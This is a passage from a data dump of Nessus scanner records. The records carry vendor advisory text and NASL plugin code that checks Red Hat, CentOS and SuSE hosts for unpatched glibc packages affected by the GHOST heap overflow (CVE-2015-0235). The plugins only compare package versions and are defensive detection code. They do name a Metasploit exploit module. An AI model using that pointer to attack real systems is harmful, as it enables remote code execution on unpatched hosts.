audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:25", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81034);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0092\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:26", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 5 : glibc (CESA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# CentOS Errata and Security Advisory 2015:0090 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81025);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93e1c138\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:33", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:glibc", "p-cpe:/a:novell:suse_linux:11:glibc-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-devel", "p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-html", "p-cpe:/a:novell:suse_linux:11:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:11:glibc-info", "p-cpe:/a:novell:suse_linux:11:glibc-locale", "p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-profile", "p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:11:nscd", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_GLIBC-150122.NASL", "href": "https://www.tenable.com/plugins/nessus/81039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81039);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 11 Security Update : glibc (SAT Patch Numbers 10202,10204,10206)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"\nApply the correct SAT patch number for your operating system :\nSLES11 SP1: 10202\nSLES11 SP2: 10204\nSLED/SLES11 SP3: 10206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\n# 11.1\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-devel-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-html-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"glibc-i18ndata-2.11.1-0.60.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, 